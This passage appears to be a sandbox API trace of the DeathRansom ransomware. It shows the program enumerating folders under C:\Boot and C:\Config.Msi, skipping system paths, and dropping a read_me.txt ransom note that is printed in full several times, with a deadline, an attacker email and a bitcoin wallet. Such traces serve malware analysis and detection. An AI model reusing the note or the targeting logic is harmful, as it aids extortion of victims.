WriteFile (in: hFile=0x7b0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.767] CloseHandle (hObject=0x7b0) returned 1 [0073.767] GetProcessHeap () returned 0x280000 [0073.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60110 | out: hHeap=0x280000) returned 1 [0073.767] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0073.767] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0073.767] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0073.767] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0073.767] StrStrW (lpFirst="zh-hk", lpSrch="programdata") returned 0x0 [0073.767] StrStrW (lpFirst="zh-hk", lpSrch="$recycle.bin") returned 0x0 [0073.767] StrStrW (lpFirst="zh-hk", lpSrch="program files") returned 0x0 [0073.767] StrStrW (lpFirst="zh-hk", lpSrch="windows") returned 0x0 [0073.767] StrStrW (lpFirst="zh-hk", lpSrch="all users") returned 0x0 [0073.767] StrStrW (lpFirst="zh-hk", lpSrch="appdata") returned 0x0 [0073.767] GetProcessHeap () returned 0x280000 [0073.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60110 [0073.767] lstrcpyW (in: lpString1=0x8b60110, lpString2="\\\\?\\C:\\Boot\\zh-HK" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK") returned="\\\\?\\C:\\Boot\\zh-HK" [0073.767] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 24 [0073.767] QueueUserWorkItem (Function=0x40a710, Context=0x8b60110, Flags=0x0) returned 1 [0073.768] GetProcessHeap () returned 0x280000 [0073.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.768] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0073.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.809] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0073.809] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.809] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.809] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.809] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0073.809] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.809] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.809] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0073.809] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.809] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.809] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt") returned 29 [0073.809] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt" (normalized: "c:\\boot\\zh-hk\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0073.810] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.810] WriteFile (in: hFile=0x7b8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.810] CloseHandle (hObject=0x7b8) returned 1 [0073.811] GetProcessHeap () returned 0x280000 [0073.811] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.811] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0073.811] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0073.811] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0073.811] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0073.811] StrStrW (lpFirst="zh-tw", lpSrch="programdata") returned 0x0 [0073.811] StrStrW (lpFirst="zh-tw", lpSrch="$recycle.bin") returned 0x0 [0073.811] StrStrW (lpFirst="zh-tw", lpSrch="program files") returned 0x0 [0073.811] StrStrW (lpFirst="zh-tw", lpSrch="windows") returned 0x0 [0073.811] StrStrW (lpFirst="zh-tw", lpSrch="all users") returned 0x0 [0073.811] StrStrW (lpFirst="zh-tw", lpSrch="appdata") returned 0x0 [0073.811] GetProcessHeap () returned 0x280000 [0073.811] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.811] lstrcpyW (in: lpString1=0x8a00060, lpString2="\\\\?\\C:\\Boot\\zh-TW" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW") returned="\\\\?\\C:\\Boot\\zh-TW" [0073.811] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 25 [0073.811] QueueUserWorkItem (Function=0x40a710, Context=0x8a00060, Flags=0x0) returned 1 [0073.811] GetProcessHeap () returned 0x280000 [0073.811] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.811] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0073.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.812] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0073.812] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.812] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.812] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0073.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.812] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.812] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0073.812] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.812] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.812] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt") returned 29 [0073.812] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt" (normalized: "c:\\boot\\zh-tw\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0073.812] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.812] WriteFile (in: hFile=0x7b8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.813] CloseHandle (hObject=0x7b8) returned 1 [0073.813] GetProcessHeap () returned 0x280000 [0073.813] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.813] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0073.813] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.813] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\read_me.txt") returned 23 [0073.814] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\read_me.txt" (normalized: "c:\\boot\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.814] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.814] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e5d4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e5d4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.815] CloseHandle (hObject=0x780) returned 1 [0073.815] GetProcessHeap () returned 0x280000 [0073.815] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a10068 | out: hHeap=0x280000) returned 1 [0073.815] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x2f1ed8, dwReserved1=0x17e630, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0073.815] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0073.815] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x2f1ed8, dwReserved1=0x17e630, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0073.815] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0073.815] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f1ed8, dwReserved1=0x17e630, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0073.815] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0073.815] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0073.815] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0073.815] StrStrW (lpFirst="config.msi", lpSrch="programdata") returned 0x0 [0073.815] StrStrW (lpFirst="config.msi", lpSrch="$recycle.bin") returned 0x0 [0073.815] StrStrW (lpFirst="config.msi", lpSrch="program files") returned 0x0 [0073.815] StrStrW (lpFirst="config.msi", lpSrch="windows") returned 0x0 [0073.815] StrStrW (lpFirst="config.msi", lpSrch="all users") returned 0x0 [0073.815] StrStrW (lpFirst="config.msi", lpSrch="appdata") returned 0x0 [0073.816] GetProcessHeap () returned 0x280000 [0073.816] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a10068 [0073.816] lstrcpyW (in: lpString1=0x8a10068, lpString2="\\\\?\\C:\\Config.Msi" | out: lpString1="\\\\?\\C:\\Config.Msi") returned="\\\\?\\C:\\Config.Msi" [0073.816] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 26 [0073.816] QueueUserWorkItem (Function=0x40a710, Context=0x8a10068, Flags=0x0) returned 1 [0073.816] GetProcessHeap () returned 0x280000 [0073.816] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.816] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0073.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.816] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0073.816] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.816] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0073.816] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0073.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.816] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 0 [0073.816] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.816] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Config.Msi\\read_me.txt") returned 29 [0073.816] 